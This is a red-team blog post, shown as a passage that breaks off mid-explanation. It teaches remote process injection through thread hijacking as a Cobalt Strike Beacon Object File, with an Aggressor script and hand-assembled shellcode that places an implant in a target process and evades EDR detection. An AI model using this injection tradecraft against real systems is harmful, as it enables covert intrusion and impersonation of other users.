Normal view

There are new articles available, click to refresh the page.
Before yesterdayConnor McGarr

Malware Development: Leveraging Beacon Object Files for Remote Process Injection via Thread Hijacking

9 January 2021 at 00:00

Introduction

As people I have interacted with will attest, my favorite subject in the entire world is binary exploitation. I love everything about it, from the problem solving aspects to the OS internals, assembly, and C side of the house. I also enjoy pushing my limits in order to find new and creative solutions for exploitation. In addition to my affinity for exploitation, I also love to red team. After all, this is what I do on a day to day basis. While I love to work my way around enterprise networks, I find myself really enjoying the host-based avoidance aspects of red teaming. I find it incredibly fun and challenging to use some of my prerequisite knowledge on exploitation and Windows internals in order to bypass security products and stay undetected (well, try to anyways). With Cobalt Strike, a very popular remote access tool (RAT), being so widely adopted by red teams - I thought I would investigate deeper into a newer Cobalt Strike capability, Beacon Object Files, which allow operators to write post-exploitation capabilities in C (which makes me incredibly happy as a person). This blog will go over a technique known as thread hijacking and integrating it into a usable Beacon Object File.

However, before beginning, I would like to delineate this post will be focused on the technique of remote process injection, thread hijacking, and thread restoration - not so much on Beacon Object Files themselves. Beacon Object Files, for our purposes, are a means to an end, as this technique can be deployed in many other fashions. As was aforementioned, Cobalt Strike is widely adopted and I think it is a great tool and I am a big proponent of it. I still believe at the end of the day, however, it is more important to understand the overarching concept surrounding a TTP (Tactic, Technique, and Procedure), versus learning how to just arbitrarily run a tool, which in turn will create a bottleneck in your red teaming methodology by relying on a tool itself. If Cobalt Strike went away tomorrow, that shouldn’t render this TTP, or any other TTPs, useless. However, almost contradictory, this first portion of this post will briefly outline what Beacon Object Files are, a quick recap on remote process injection, and a bit on writing code that adheres to the needs of Beacon Object Files.

Lastly, the final project can be found here.

Beacon Object Files - You have two minutes, go.

Back in June, I saw a very interesting blog post from Cobalt Strike that outlined a new Beacon capability, known as Beacon Object Files. Beacon Object Files, stylized as BOFs, are essentially compiled C programs that are executed as position-independent code within Beacon. You bring the object file and Cobalt Strike supplies the linking. Raphael Mudge, the creator of Cobalt Strike, has a YouTube video that goes over the intrinsics, capabilities, and limitations of BOFs. I highly recommend you check out this video. In addition, I encourage you to check out TrustedSec’s BOF blog and project to supplement the available Cobalt Strike documentation for BOF development.

One thing to note before moving on is that BOFs are intended to be “lightweight” tools. Lightweight may be subjective, but as Raphael points out in his video and blog, the main benefit of BOFs are twofold:

  1. BOFs do not spawn a temporary “sacrificial” process to perform post-exploitation work - they’re directly executed as position-independent code within the current Beacon process, increasing overall OPSEC (operational security).
  2. BOFs are really meant to interact with the Windows API and the internal Beacon API, as BOFs expose a set of functions operators can use when developing. This means BOFs are smaller in size and easily allow you to invoke Window APIs and interact with the internal Beacon API.

Additionally, there are a few drawbacks to BOFs:

  1. Cobalt Strike is the linker for BOFs - meaning libc style functions like strlen will not resolve. To compensate for this, however, you can use BOF compliant decorators in your function prototypes with the MSVCRT (Microsoft C Run-time) library and grab such functions from there. Declaring and using such functions with BOFs will be outlined in the latter portions of this post. Additionally, from Raphael’s CVE-2020-0796 BOF, there are ways to define your own C-style functions.
  2. BOFs are executed within the current Beacon process - meaning that if your BOF encounters some kind of internal error and fails, your Beacon process will crash as well. This means BOFs should be carefully vetted and tested across multiple systems, networks, and environments, while also implementing host-based checks for version information, using properly documented data types and structures outlined in a function’s prototype, and cleaning up any opened handles, allocated memory, etc.

Now that that’s out of the way, let’s get into a bit of background on remote process injection and thread hijacking, as well as outline our BOF’s execution flow.

Remote Process Injection

Remote process injection, for the unfamiliar, is a technique in which an operator can inject code into another process on a machine, under certain circumstances. This is most commonly done with a chain of Windows APIs being called in order to allocate some memory in the other process, write user-defined memory (usually a shellcode of some sort) to that allocation, and kicking off execution by create a thread within the remote process. The APIs, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread are often popular choices, respectively.

Why is remote process injection important? Take a look at the image below, which is a listing of processes performed inside of a Cobalt Strike Beacon implant.

As is seen above, Cobalt Strike not only discloses to the operator what processes are running, but also under what user context a certain process is running under. This could be very useful on a penetration test in an Active Directory environment where the goal is to obtain domain administrative access. Let’s say you as an operator obtain access to a server where there are many users logged in, including a user with domain administrative access. This means that there is a great likelihood there will be processes running in context of this high-value user. This concept can be seen below where a second process listing is performed where another user, ANOTHERUSER has a PowerShell.exe process running on the host.

Using Cobalt Strike’s built-in inject capability, a raw Beacon implant can be injected into the PowerShell.exe process utilizing the remote injection technique outlined in the Cobalt Strike Malleable C2 profile, resulting in a second callback, in context of the ANOTHERUSER user, using the PID of the PowerShell.exe instance, process architecture (64-bit), and the name of the Cobalt Strike listener as arguments.

After the injection, there is a successful callback, resulting in a valid session in context of the OTHERUSER user.

This is useful to a red team operator, as the credentials for the OTHERUSER were not needed in order to obtain access in context of said user. However, there are a few drawbacks - including the addition of endpoint detection and response (EDR) products that detect on such behavior. One of the indicators of compromise (IOC) would be, in this instance, a remote thread being created in a remote process. There are more IOCs for this TTP, but this blog will focus on circumventing the need to create a remote thread. Instead, let’s examine thread hijacking, a technique in which an already existing thread within the target process is suspended and manipulated in order to execute shellcode.

Thread Hijacking and Thread Restoration

As mentioned earlier, the process for a typical remote injection is:

  1. Allocate a memory region within the target process using VirtualAllocEx. A handle to the target process must already be existing with an access right of at least PROCESS_VM_OPERATION in order to leverage this API successfully. This handle can be obtained using the Windows API function OpenProcess.
  2. Write your code to the allocated region using WriteProcessMemory. A handle to the target process must already be existing with an access right of at least PROCESS_WRITE and the previously mentioned PROCESS_VM_OPERATION - meaning a handle to the remote process must have both of these access rights at minimum to perform remote injection.
  3. Create a remote thread, within the remote process, to execute the shellcode, using CreateRemoteThread.

Our thread hijacking technique will utilize the first two members of the previous list, but instead of CreateRemoteThread, our workflow will consist of the following:

  1. Open a handle to the remote process using the aforementioned access rights required by VirtualAllocEx and WriteProcessMemory.
  2. Loop through the threads on the machine utilizing the Windows API CreateToolhelp32Snapshot. This loop will contain logic to break upon identifying the first thread within the target process.
  3. Upon breaking the loop, open a handle to the target thread using the Windows API function OpenThread.
  4. Call SuspendThread, passing the former thread handle mentioned as the argument. SuspendThread requires the handle has an access right of THREAD_SUSPEND_RESUME.
  5. Call GetThreadContext, using the thread handle. This function requires that handles have a THREAD_GET_CONTEXT access right. This function will dump the current state of the target thread’s CPU registers, processor flags, and other CPU information into a CONTEXT record. This is because each thread has its own stack, CPU registers, etc. This information will be later used to execute our shellcode and to restore the thread once execution has completed.
  6. Inject the shellcode into the desired process using VirtualAllocEx and WriteProcessMemory. The shellcode that will be used in this blog will be the default Cobalt Strike payload, which is a reflective DLL. This payload will be dynamically generated with a user-specified listener that exists already, using a Cobalt Strike Aggressor Script. Creation of the Aggressor Script will follow in the latter portions of this blog post. The Beacon implant won’t be executed quite yet, it will just be sitting within the target remote process, for the time being.
  7. Since Cobalt Strike’s default stageless payload is a reflective DLL, it works a bit differently than traditional shellcode. Because it is a reflective DLL, when the DllMain function is called to kick off Beacon, the shellcode never performs a “return”, because Beacon calls either ExitThread or ExitProcess to leave DllMain, depending on what is specified in the payload by the operator. Because of this, it would not be possible to restore the hijacked thread, as the thread will run the DllMain function until the operator exits the Beacon, since the stageless raw Beacon artifact does not perform a “return”. Due to this, we must create a shellcode that our Beacon implant will be wrapped in, with a custom CreateThread routine that creates a local thread within the remote process for the Beacon implant to run. Essentially, this is one of three components our “new” full payload will “carry”, so when execution reaches the remote process, the call to CreaeteThread, which creates a local thread, will allocate the thread in the remote process for Beacon to run in. This means that the hijacked thread will never actually execute the Beacon implant, it will actually execute a small shellcode, made up of three components, that places the Beacon implant into its own local thread, along with a two other routines that will be described here shortly. Up until this point, no code has been executed and everything mentioned is just a synopsis of each component’s purpose.
  8. The custom CreateThread routine is actually executed by being called from another routine that will be wrapped into our final payload, which is a routine for a call to NtContinue. This is the second component of our custom shellcode. After the CreateThread routine is finished executing, it will perform a return back into the NtContinue routine. After the hijacked thread executes the CreateThread routine, the thread needs to be restored with the original CPU registers, flags, etc. it had before the thread hijack occurred. NtContinue will be talked about in the latter portions of this post, but for now just know that NtContinue, at a high level, is a function in ntdll.dll that accepts a pointer to a CONTEXT record and sets the calling thread to that context. Again, no code has been executed so far. The only thing that has changed is our large “final payload” has added another component to it, NtContinue.
  9. The CreateThread routine is first prepended with a stack alignment routine, which performs bitwise AND with the stack pointer, to ensure a 16-byte alignment. Some function calls fail if they are not 16-byte aligned, and this ensures when the shellcode performs a call to the CreateThread routine, it is first 16-byte aligned. malloc is then invoked to create one giant buffer that all of these “moving parts” are added to.
  10. Now that there is one contiguous buffer for the final payload, using VirtualAllocEx and WriteProcessMemory, again, the final payload, consisting of the three routines, is injected into the remote process.
  11. Lastly, the previously captured CONTEXT record is updated to point the DWORD.Rip member, which represents the value of the 64-bit instruction pointer, to the address of our full payload.
  12. SetThreadContext is then called, which forces the target thread to be updated to point to the final payload, and ResumeThread is used to queue our shellcode execution, by resuming the hijacked thread.

Before moving on, there are two things I would like to call out. The first is the call to CreateThread. At first glance, this may seem like it is not a viable alternative to CreateRemoteThread directly. The benefit of the thread hijacking technique is that even though a thread is created, it is not created from a remote process, it is created locally. This does a few things, including avoiding the common API call chain of VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread and secondly, by blending in (a bit more) by calling CreateThread, which is a less scrutinized API call. There are other IOCs to detect this technique. However, I will leave that as an exercise to the reader :-).

Let’s move on and start with come code.

Visual Studio + Beacon Object File Intrinsics

For this project, I will be using Visual Studio and the MSVC Compiler, cl.exe. Feel free to use mingw, as it can also produce BOFs. Let’s go over a few house rules for BOFs before we begin.

In order to compile a BOF on Visual Studio, open an x64 Native Tools Command Prompt for VS session and use the following command: cl /c /GS- INPUT.c /FoOUTPUT.o. This will compile the C program as an object file only and will not implement stack cookies, due to the Cobalt Strike linker obviously not being able to locate the injected stack cookie check functions.

If you would like to call a Windows API function, BOFs require a __declspec(dllimport) keyword, which is defined in winnt.h as DECLSPEC_IMPORT. This indicates to the compiler that this function is found within a DLL, telling the compiler essentially “this function will be resolved later” and as mentioned before, since Cobalt Strike is the linker, this is needed to tell the compiler to let the linking come later. Since the linking will come later, this also means a full function prototype must be supplied to the BOF. You can use Visual Studio to “peek” the prototype of a Windows API function. This will suffice in attributing the __declspec(dllimport) keyword to our function prototypes, as the prototypes of most Windows API functions contain a #define directive with a definition of WINBASEAPI, or similar, which already contains a __declspec(dllimport) keyword. An example would be the prototype of the function GetProcAddress, as seen below.

This reveals the __declspec(dllimport) keyword will be present when this BOF is compiled.

Armed with this information, if an operator wanted to include the function GetProcAddress in their BOF, it would be outlined as such:

WINBASEAPI FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE, LPCSTR);

The value directly before the $ represents the library the function is found in. The relocation table of the object file, which essentially contains pointers to the list of items the object file needs addresses from, like functions other libraries or object files, will point to the prototyped LIB$Function functions memory address. Cobalt Strike, acting as the linker and loader, will parse this table and update the relocation table of the object file, where applicable, with the actual addresses of the user-defined Windows API functions, such as GetProcAddress in the above test case. This blob is then passed to Beacon as a code to be executed. Not reinventing the wheel here, Raphael outlines this all in his wonderful video.

In addition to this, I will hit on one last thing - and that is user-supplied arguments and returning output back to the operator. Beacon exposes an internal API to BOFs, that are outlined in the beacon.h header file, supplied by Cobalt Strike. For returning output back to the operator, the API BeaconPrintf is exposed, and can return output over Beacon. This API accepts a user-supplied string, as well as #define directive in beacon.h, namely CALLBACK_OUTPUT and CALLBACK_ERROR. For instance, updating the operator with a message would be implemented as such:

BeaconPrintf(CALLBACK_OUTPUT, "[+] Hello World!\n");

For accepting user supplied arguments, you’ll need to implement an Aggressor Script into your project. The following will be the script used for this post.

# Setup cThreadHijack
alias cThreadHijack {

    # Alias for Beacon ID and args
    local('$bid $listener $pid $payload');
    
    # Set the number of arguments
    ($bid, $pid, $listener) = @_;

    # Determine the amount of arguments
    if (size(@_) != 3)
    {
        berror($bid, "Error! Please enter a valid listener and PID");
    return;
    }

    # Read in the BOF
    $handle = openf(script_resource("cThreadHijack.o"));
    $data = readb($handle, -1);
    closef($handle);

    # Verify PID is an integer
    if ((!-isnumber $pid) || (int($pid) <= 0))
    {
        berror($bid, "Please enter a valid PID!\n");
        return;
    }

    # Generate a new payload 
    $payload = payload_local($bid, $listener, "x64", "thread");
    $handle1 = openf(">out.bin");
    writeb($handle1, $data1);
    closef($handle1);
    
    # Pack the arguments
    # 'b' is binary data and 'i' is an integer
    $args = bof_pack($bid, "ib", $pid, $payload);

    # Run the BOF
    # go = Entry point of the BOF
    beacon_inline_execute($bid, $data, "go", $args);
}

The goal is to be able to supply our BOF to Cobalt Strike, with the very original name cThreadHijack, a PID for injection and the name of the Cobalt Strike listener. The first local statement sets up our variables, which include the ID of the Beacon executing the BOF, listener name, the PID, and payload, which will be generated later. The @_ statement sets an array with the order our arguments will be supplied to the BOF, mean the command to use this BOF would be cThreadHijack "Name of listener" PID. After, error checking is done to determine if 3 arguments have been supplied (two for the PID and listener and the Beacon ID, the third argument, will be supplied to the BOF without us needing to input anything). After the object file is read in and the PID is verified, the Aggressor function payload_local is used to generate a raw Cobalt Strike payload with the user-supplied listener name and an exit method. After this, the user-supplied argument $pid is packed as an integer and the newly created $payload variable is packed as a binary value. Then, upon execution in Cobalt Strike, the alias cThreadHijacked is executed with the aforementioned arguments, using the function go as the main entry point. This script must be loaded before executing the BOF.

From the C code side, this is how it looks to set these arguments and define the functions needed for thread hijacking.

The function BeaconDataParse is first used, with a special datap structure, to obtain the user-supplied arguments. Then, the value int pid is set to the user-supplied PID, while the char* shellcode value is set to the Beacon implant, meaning everything is in place. Finally, now that details on adhering to BOF’s rules while writing C is out of the way, let’s get into the code.

Open, Enumerate, Suspend, Get, Inject, and Get Out!

The first step in thread hijacking is to first open a handle to the target process. As mentioned before, calls that utilize this handle, VirtualAllocEx and WriteProcessMemory, must have a total access right of PROCESS_VM_OPERATION and PROCESS_VM_WRITE. This can be correlated to the following code.

This function accepts the user-supplied argument for a PID and returns a handle to it. After the process handle is opened, the BOF starts enumerating threads using the API CreateToolhelp32Snapshot. This routine is sent through a loop and “breaks” upon the first thread of the target PID being reached. When this happens, a call to OpenThread with the rights THREAD_SUSPEND_RESUME, THREAD_SET_CONTEXT, and THREAD_GET_CONTEXT occurs. This allows the program to suspend the thread, obtain the thread’s context, and set the thread’s context.

At this point, the goal is to suspend the identified thread, in order to obtain its current CONTEXT record and later set its context again.

Once the thread has been suspended, the Beacon implant is remotely injected into the target process. This will not be the final payload the hijacked thread will execute, this is simply to inject the Beacon implant into the remote process in order to use this address later on in the CreateThread routine.

Now that the remote thread is suspended and our Beacon implant shellcode is sitting within the remote process address space, it is time to implement a BYTE array that places the Beacon implant in a thread and executes it.

Beacon - Stay Put!

As previously mentioned, the first goal will be to place the already injected Beacon implant into its own thread. Currently, the implant is just sitting within the desired remote process and has not executed. To do this, we will create a 64-byte BYTE array that will contain the necessary opcodes to perform this task. Let’s take a look at the CreateThread function prototype.

HANDLE CreateThread(
  LPSECURITY_ATTRIBUTES   lpThreadAttributes,
  SIZE_T                  dwStackSize,
  LPTHREAD_START_ROUTINE  lpStartAddress,
  __drv_aliasesMem LPVOID lpParameter,
  DWORD                   dwCreationFlags,
  LPDWORD                 lpThreadId
);

As mentioned by Microsoft documentation, this function will create a thread to execute within the virtual address space of the calling function. Since we will be injecting this routine into the remote process, when the routine executed, it will create a thread within the remote process. This is beneficial to us, as CreateThread creates a local thread - but since the routine will be executed inside of the remote process, it will spawn a local thread, instead of requiring us to create a thread, remotely, from our current process.

The function argument we will be worried about is LPTHREAD_START_ROUTINE, which is really just a function pointer to whatever the thread will execute. In our case, this will be the address of our previously injected Beacon implant. We already have this address, as VirtualAllocEx has a return value of type LPVOID, which is a pointer to our shellcode. Let’s get into the development of the routine.

The first step is to declare a BYTE array of 64-bytes. 64-bytes was chosen, as it is divisible by a QWORD, which is a 64-bit address. This is to ensure proper alignment, meaning 8 QWORDS will be used for this routine - which keeps everything nice and aligned. Additionally, we will declare an integer variable to use as a “counter” in order to make sure we are placing our opcodes at the correct index within the BYTE array.

BYTE createThread[64] = { NULL };
int z = 0;

Since we are working on a 64-bit system, we must adhere to the __fastcall calling convention. This calling convention requires the first four integer arguments (floating-point values are passed in different registers) are passed in the RCX, RDX, R8, and R9 registers, respectively. However, the question remains - CreateThread has a total of six parameters, what do we do with the last two? With __fastcall, the fifth and subsequent parameters are located on the stack at an offset of 0x20 and every 0x8 bytes subsequently. This means, for our purposes, the fifth parameter will be located at RSP + 0x20 and the sixth will be located at RSP + 0x28. Here are the parameters used for our purposes.

  1. lpThreadAttributes will be set to NULL. Setting this value to NULL will ensure the thread handle isn’t inherited by child processes.
  2. dwStackSize will be set to 0. Setting this parameter to 0 forces the thread to inherit the default stack size for the executable, which is fine for our purposes.
  3. lpStartAddress, as previously mentioned, will be the address of our shellcode. This parameter is a function pointer to be executed by the thread.
  4. lpParameter will be set to NULL, as our thread does not need to inherit any variables.
  5. dwCreationFlags will be set to 0, which informs the thread we would like to thread to run immediately after it is created. This will kick off our Beacon implant, after thread creation.
  6. lpThreadId will be set to NULL, which is of less importance to us - as this will not return a thread ID to the LPDWORD pointer parameter. Essentially, we could have passed a legitimate pointer to a DWORD and it would have been dynamically filled with the thread ID. However, this is not important for purpose of this post.

The first step is to place a value of NULL, or 0, into the RCX register, for the lpThreadAttributes argument. To do this, we can use bitwise XOR.

// xor rcx, rcx
createThread[z++] = 0x48;
createThread[z++] = 0x31;
createThread[z++] = 0xc9;

This performs bitwise XOR with the same two values (RCX), which results in 0 as bitwise XOR with two of the same values results in 0. The result is then placed in the RCX register. Synonymously, we can leverage the same property of XOR for the second parameter, dwStackSize, which is also 0.

// xor rdx, rdx
createThread[z++] = 0x48;
createThread[z++] = 0x31;
createThread[z++] = 0xd2;

The next step, is really the only parameter we need to specify a specific value for, which is lpStartAddress. Before supplying this parameter, let’s take a quick look back at our first injection, which planted the Beacon implant into the desired remote process.

The above code returns the virtual memory address of our allocation into the variable placeRemotely. As can be seen, this return value is of the data type LPVOID, while the lpStartParameter argument takes a data type of LPTHREAD_START_ROUTINE, which is pretty similar with LPVOID. However, for continuity sake, we will first type cast this allocation into an LPTHREAD_START_ROUTINE function pointer.

// Casting shellcode address to LPTHREAD_START_ROUTINE function pointer
LPTHREAD_START_ROUTINE threadCast = (LPTHREAD_START_ROUTINE)placeRemotely;

In order to place this value into the BYTE array, we will need to use a function that can copy this address to the buffer, as the BYTE array will only accept one byte at a time. There is a limitation however, as BOFs do not link C-Runtime functions such as memcpy. We can overcome this by creating our own custom memcpy routine, or grabbing one from the MSVCRT library, which Cobalt Strike can link to us. However, for now and for awareness of others, we will leverage a libc.h header file that Raphael created, which can be found here.

Using the custom mycopy function, we can now perform a mov r8, LPTHREAD_START_ROUTINE instruction.

// mov r8, LPTHREAD_START_ROUTINE
createThread[z++] = 0x49;
createThread[z++] = 0xb8;
mycopy(createThread + z, &threadCast, sizeof(threadCast));
z += sizeof(threadCast);

Notice how the end of this small shellcode blob contains an update for the array index counter z, to ensure as the array is written to at the correct index. We have the luxury of using a mov r8, LPTHREAD_START_ROUTINE, as our shellcode pointer has already been mapped into the remote process. This will allow the CreateThread routine to find this function pointer, in memory, as it is available within the remote process address space. We must remember that each process on Windows has its own private virtual address space, meaning memory in one user mode process isn’t visible to another user mode process. As we will see with the NtContinue stub coming up, we will actually have to embed the preserved CONTEXT record of the hijacked thread into the payload itself, as the structure is located in the current process, while the code will be executing within the desired remote process.

Now that the lpStartAddress parameter has been completed, lpParameter must be set to NULL. Again, this can be done by utilizing bitwise XOR.

// xor r9, r9
createThread[z++] = 0x4d;
createThread[z++] = 0x31;
createThread[z++] = 0xc9;

The last two parameters, dwCreationFlags and lpThreadId will be located at an offset of 0x20 and 0x28, respectively, from RSP. Since R9 already contains a value of 0, and since both parameters need a value of 0, we can use to mov instructions, as such.

// mov [rsp+20h], r9 (which already contains 0)
createThread[z++] = 0x4c;
createThread[z++] = 0x89;
createThread[z++] = 0x4c;
createThread[z++] = 0x24;
createThread[z++] = 0x20;

// mov [rsp+28h], r9 (which already contains 0)
createThread[z++] = 0x4c;
createThread[z++] = 0x89;
createThread[z++] = 0x4c;
createThread[z++] = 0x24;
createThread[z++] = 0x28;

A quick note - notice that the brackets surrounding each [rsp+OFFSET] operand indicate we would like to overwrite what that value is pointing to.

The next goal is to resolve the address of CreateThread. Even though we will be resolving this address within the BOF, meaning it will be resolved within the current process, not the desired remote process, the address of CreateThread will be the same across processes, although each user mode process is mapped its own view of kernel32.dll. To resolve this address, we will use the following routine, with BOF denotations in our code.

// Resolve the address of CreateThread
unsigned long long createthreadAddress = KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA("kernel32"), "CreateThread");

// Error handling
if (createthreadAddress == NULL)
{
  BeaconPrintf(CALLBACK_ERROR, "Error! Unable to resolve CreateThread. Error: 0x%lx\n", KERNEL32$GetLastError());
}

The unsigned long long variable createthreadAddress will be filled with the address of CreateThread. unsigned long long is a 64-bit value, which is the size of a memory address on a 64-bit system. Although KERNEL32$GetProcAddress has a prototype with a return value of FARPROC, we need the address to actually be of the type unsigned long long, DWORD64, or similar, to allow us to properly copy this address into the routine with mycopy. The next goal is to move the address of CreateThread into RAX. After this, we will perform a call rax instruction, which will kick off the routine. This can be seen below.

// mov rax, CreateThread
createThread[z++] = 0x48;
createThread[z++] = 0xb8;
mycopy(createThread + z, &createthreadAddress, sizeof(createthreadAddress));
z += sizeof(createthreadAddress);

// call rax (call CreateThread)
createThread[z++] = 0xff;
createThread[z++] = 0xd0;

Additionally, we want to add a ret opcode. The way our full payload will be setup is as follows:

  1. A call to the stack alignment/CreateThread routine will be made firstly (the stack alignment routine will be hit on in a latter portion of this blog). When a call instruction is executed, it pushes a return address onto the stack. This is the address that ret will jump to in order to continue execution of the payload. When the stack alignment/CreateThread routine is called, it will push a return address onto the stack. This return address will actually be the address of the NtContinue routine.
  2. We want to end our stack alignment/CreateThread routine with a ret instruction. This ret will force execution back to the NtContinue routine. This will all be outlined when executed is examined inside of WinDbg.
  3. The call to the stack alignment/CreateThread routine is actually going to be a part of the NtContinue routine. The first instruction in the NtContinue routine will be a call to the stack alignment/CreateThread shellcode, which will then perform a ret back to the NtContinue routine, where thread execution will be restored. Here is a quick visual.

PAYLOAD = NtContinue shellcode calls stack alignment/CreateThread shellcode -> stack alignment/CreateThread shellcode executes, placing Beacon in its own local thread. This shellcode performs a return back to the NtContinue shellcode -> NtContinue shellcode finishes executing, which restores the thread

In accordance with out plan, let’s end the CreateThread routine with a 0xc3 opcode, which is a return instruction.

// Return to the caller in order to kick off NtContinue routine
createThread[z++] = 0xc3;

Let’s continue by developing a NtContinue shellcode routine. After that, we will develop a stack alignment shellcode in order to ensure the stack pointer is 16-byte aligned, when the first call occurs in our final payload. Once we have completed both of these routines, we will walk through the entire shellcode inside of the debugger.

“Never in the Field of Human Conflict, Was So Much Owed, by So Many, to NtContinue

Up until now, we have achieved the following:

  1. Our shellcode has been injected into the remote process.
  2. We have identified a remote thread, which we will later manipulate to execute our Beacon implant
  3. We have created a routine that will place the Beacon implant in its own local thread, within the remote process, upon execution

This is great, and we are almost home free. The issue remains, however, the topic of thread restoration. After all, we are taking a thread, which was performing some sort of action before, unbeknownst to us, and forcing it to do something else. This will certainly result in execution of our shellcode, however, it will also present some unintended consequences. Upon executing our shellcode, the thread’s CPU registers, along with other information, will be out of context from the actions it was performing before execution. This will cause the the process housing this thread, the desired remote process we are injecting into, to most likely crash. To avoid this, we can utilize an undocumented ntdll.dll function, NtContinue. As pointed out in Alex Ionescu and Yarden Shafir’s R.I.P ROP: CET Internals in Windows 20H1 blog post, NtContinue is used to resume execution after an exception or interrupt. This is perfect for our use case, as we can abuse this functionality. Since our thread will be mangled, calling this function with the preserved CONTEXT record from earlier will restore execution properly. NtContinue accepts a pointer to a CONTEXT record, and a parameter that allows a programmer to set if the Alerted state should be removed from the thread, as outlined in its function prototype. We need not worry about the second parameter for our purposes, as we will set this parameter to FALSE. However, there remains the issue of the first parameter, PCONTEXT.

As you can recall in the former portion of this blog post, we first preserved the CONTEXT record for our hijacked thread, within our BOF code. The issue we have, however, is that this CONTEXT record is sitting within the current process, while our shellcode will be executed within the desired remote process. Because of the fact each user mode process has its own private address space, this CONTEXT record’s address is not visible to the remote process we are injecting into. Additionally, since NtContinue does not accept a HANDLE parameter, it expects the thread it will resume execution for is the current calling thread, which will be in the remote process. This means we will need to embed the CONTEXT record into our final payload that will be injected into the remote process. Additionally, since NtContinue restores execution of the calling thread, this is why we need to embed an NtContinue shellcode into the final payload that will be placed into the remote process. That way, when the hijacked thread executes the NtContinue routine, restoration of the hijacked thread will occur, since it is the calling thread. With that said, let’s get into developing the routine.

Synonymous with our CreateThread routine, let’s create a 64-byte buffer and a new counter.

BYTE ntContinue[64] = { NULL };
int i = 0;

As mentioned earlier, this NtContinue routine is going to be the piece of code that actually invokes the CreateThread routine. When this NtContinue routine performs the call to the CreateThread routine, it will push a return address on the stack, which will be the next instruction within this NtContinue shellcode. When the CreateThread shellcode performs its return, execution will pick back up inside of the NtContinue shellcode. With this in mind, let’s start by using a near call, which uses relative addressing, to call the CreateThread shellcode.

The first goal is to start off the NtContinue routine with a call to the CreateThread routine. To do this, we first need to calculate the distance from this call instruction to the location of the CreateThread shellcode. In order to properly do this, we need to take one thing into consideration, and that is we need to also carry the preserved CONTEXT record with us, for use, in the NtContinue call. To do this, we will use a near call procedure. Near calls, in assembly, do not call an absolute address, like the address of a Windows API function, for instance. Instead, near call instructions can be used to call a function, relative to the address in the instruction pointer. Essentially, if we can calculate the distance, in a DWORD, to the CreateThread routine, we can just invoke the opcode 0xe8, along with a DWORD to represent the distance from the current memory location, in order to dynamically call the CreateThread routine! The reason we are using a DWORD, which is a 32-bit value, is because the x86 instruction set, which is usable by 64-bit systems, allows either a 16-bit or 32-bit relative virtual address (RVA). However, this 32-bit value is sign extended to a 64-bit value on 64-bit systems. More information on the different calling mechanisms on x86_64 systems can be found here. The offset to our shellcode will be the size of our NtContinue routine plus the size of a CONTEXT record. This essentially will “jump over” the NtContinue code and the CONTEXT record, in order to first execute the CreatThread routine. The corresponding instructions we need, are as follows.

// First calculate the size of a CONTEXT record and NtContinue routine
// Then, "jump over shellcode" by calling the buffer at an offset of the calculation (64 bytes + CONTEXT size)

// 0xe8 is a near call, which uses RIP as the base address for RVA calculations and dynamically adds the offset specified by shellcodeOffset
ntContinue[i++] = 0xe8;

// Subtracting to compensate for the near call opcode (represented by i) and the DWORD used for relative addressing
DWORD shellcodeOffset = sizeof(ntContinue) + sizeof(CONTEXT) - sizeof(DWORD) - i;
mycopy(ntContinue + i, &shellcodeOffset, sizeof(shellcodeOffset));

// Update counter with location buffer can be written to
i += sizeof(shellcodeOffset);

Although the above code practically represents what was said about, you can see that the size of a DWORD and the value of i are subtracted from the offset previously mentioned. This is because, the whole NtContinue routine is 64 bytes. By the time the code has finished executing the entire call instruction, a few things will have happened. The first being, the call instruction itself, 0xe8, will have been executed. This takes us from being at the beginning of our routine, byte 1/64, to the second byte in our routine, byte 2/64. The CreateThread routine, which we need to call, is now one byte closer than when we started - and this will affect our calculations. In the above set of instructions, this byte has been compensated for, by subtracting the already executed opcode (the current value of i). Additionally, four bytes are taken up by the actual offset itself, aDWORD, which is a 4 byte value. This means execution will now be at byte 5/64 (one byte for the opcode and four bytes for the DWORD). To compensate for this, the size of a DWORD has been subtracted from the total offset. If you think about it, this makes sense. By the time the call has finished executing, the CreateThread routine will be five bytes closer. If we used the original offset, we would have overshot the CreateThread routine by five bytes. Additionally, we update the i counter variable to let it know how many bytes we have written to the overall NtContinue routine. We will walk through all of these instructions inside of the debugger, once we have finished developing this small shellcode routine.

At this point, the NtContinue routine would have called the CreateThread routine. The CreateThread routine would have returned execution back to the NtContinue routine, and the next instructions in the NtContinue routine would execute.

The next few instructions are a bit of a “hacky” method to pass the first parameter, a pointer to our CONTEXT record, to the NtContinue function. We will use a call/pop routine, which is a very documented method and can be read about here and here. As we know, we are required to place the first value, for our purposes, into the RCX register - per the __fastcall calling convention. This means we need to calculate the address of the CONTEXT record somehow. To do this, we actually use another near call instruction in order to call the immediate byte after the call instruction.

// Near call instruction to call the address directly after, which is used to pop the pushed return address onto the stack with a RVA from the same page (call pushes return address onto the stack)
ntContinue[i++] = 0xe8;
ntContinue[i++] = 0x00;
ntContinue[i++] = 0x00;
ntContinue[i++] = 0x00;
ntContinue[i++] = 0x00;

The instruction this call will execute is the immediate next instruction to be executed, which will be a pop rcx instruction added by us. Additionally the value of i at this point is saved into a new variable called contextOffset.

// The previous call instruction pushes a return address onto the stack
// The return address will be the address, in memory, of the upcoming pop rcx instruction
// Since current execution is no longer at the beginning of the ntContinue routine, the distance to the CONTEXT record is no longer 64-bytes
// The address of the pop rcx instruction will be used as the base for RVA calculations to determine the distance between the value in RCX (which will be the address of the 'pop rcx' instruction) to the CONTEXT record
// Obtaining the current amount of bytes executed thus far
int contextOffset = i;

// __fastcall calling convention
// NtContinue requires a pointer to a context record and an alert state (FALSE in this case)
// pop rcx (get return address, which isn't needed for anything, into RCX for RVA calculations)
ntContinue[i++] = 0x59;

The purpose of this, is the call instruction will push the address of the pop rcx instruction onto the stack. This is the return address of this function. Since the next instruction directly after the call is pop rcx, it will place the value at RSP, which is now the address of the pop rcx instruction due to call POP_RCX_INSTRUCTION pushing it onto the stack, into the RCX register. This helps us, as now we have a memory address that is relatively close the the CONTEXT record, which will be located directly after the call to NtContinue.

